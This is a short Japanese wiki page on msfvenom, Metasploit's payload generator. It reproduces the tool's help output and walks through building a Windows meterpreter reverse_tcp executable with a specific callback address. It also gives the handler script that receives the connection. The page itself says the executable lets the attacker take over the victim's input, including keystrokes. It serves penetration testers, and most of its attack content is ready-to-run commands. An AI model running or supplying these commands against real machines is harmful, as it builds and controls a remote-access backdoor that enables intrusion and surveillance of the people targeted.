msfvenom

提供: セキュリティ
2016年4月23日 (土) 11:38時点におけるDaemon (トーク | 投稿記録)による版 (ページの作成:「Metasploitmsfvenom とは、msfpayloadmsfencodeを組み合わせたもので、1つのフレームワークにまとめられました。msfven...」)

(差分) ←前の版 | 最新版 (差分) | 次の版→ (差分)
移動: 案内検索
スポンサーリンク

Metasploitmsfvenom とは、msfpayloadmsfencodeを組み合わせたもので、1つのフレームワークにまとめられました。msfvenomは、msfpayloadmsfencodeを置き換えるものです。

読み方

msfvenom
えむえすえふ べのむ (?)

概要

msfvenomは、ペイロードジェネレーターです。Windows などで動作するマルウェアの様なプログラムを作成できます。

使い方

コマンドらいのプション

root@kali:~# msfvenom -h
Error: MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
 
Options:
    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
    -f, --format        <format>     Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder       <encoder>    The encoder to use
    -a, --arch          <arch>       The architecture to use
        --platform      <platform>   The platform of the payload
        --help-platforms             List available platforms
    -s, --space         <length>     The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
    -i, --iterations    <count>      The number of times to encode the payload
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include
    -x, --template      <path>       Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out           <path>       Save the payload
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message

Windowsバイナリの作り方 reverse_tcpの例

Windows 用の実行ファイルを作成し、Windows で実行ファイルを実行したときに、 Metasploit 側の待受ポートに接続させ、キーの入力などを取得することができます。

reverse_tcp を利用した、 Windows 用 の実行ファイルの作り方は以下の通りです。

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.101 -b "\x00" -f exe -o Meterpreter.exe

Metasploit 側で実行するコマンドは以下の通りです。meterpreter.rc として記述します。

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
set LPORT 3333
set ExitOnSession false
exploit -j -z

Metasploit の msfconsole コマンドで meterpreter.rc を実行します。

msfconsole -r meterpreter.rc

関連項目




スポンサーリンク